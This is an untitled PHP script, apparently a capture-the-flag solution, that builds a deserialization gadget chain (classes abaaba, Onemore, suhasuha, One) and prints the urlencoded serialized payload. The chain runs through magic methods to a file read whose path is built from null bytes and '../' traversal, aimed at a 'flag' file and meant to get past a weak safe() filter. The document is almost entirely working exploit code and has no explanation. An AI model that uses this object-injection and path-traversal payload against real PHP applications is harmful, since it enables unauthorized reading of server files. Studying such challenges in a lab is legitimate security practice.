Untitled

<?php

class abaaba{
    protected $DoNotGet;

    public function __construct(){
        $this->DoNotGet=new suhasuha();
    }
    public function __get($name){

        return $this->DoNotGet->$name;
    }
    public function __toString(){
        return $this->Giveme;
    }
}

class Onemore{

    public $file;


    public function __construct(){
        $this->file="../\x00../\x00../\x00../\x00../flag";
    }

    public function readfile(){
        $this->file = isset($f) ? $f : 'image'.$this->file;
        echo file_get_contents(safe($this->file));
    }

    public function __invoke(){
        return $this->filename->Giveme;
    }
}

class suhasuha{
    private $Giveme;
    public $action;

    public function __construct(){
        $this->action =[new Onemore(),'readfile'];
    }
    public function __set($name,$value){
        $this->Giveme=($this->action)();
        return $this->Giveme;
    }
}

class One{
    public $count;

    public function __construct(){
        $this->count = new abaaba();
    }

    public function __destruct(){

    }

}

function safe($path){
    $path = preg_replace("/.*\/\/.*/", "", $path);
    $path = preg_replace("/\..\..*/", "!", $path);
    $path = htmlentities($path);
    return strip_tags($path);
}

echo urlencode(serialize(new One()));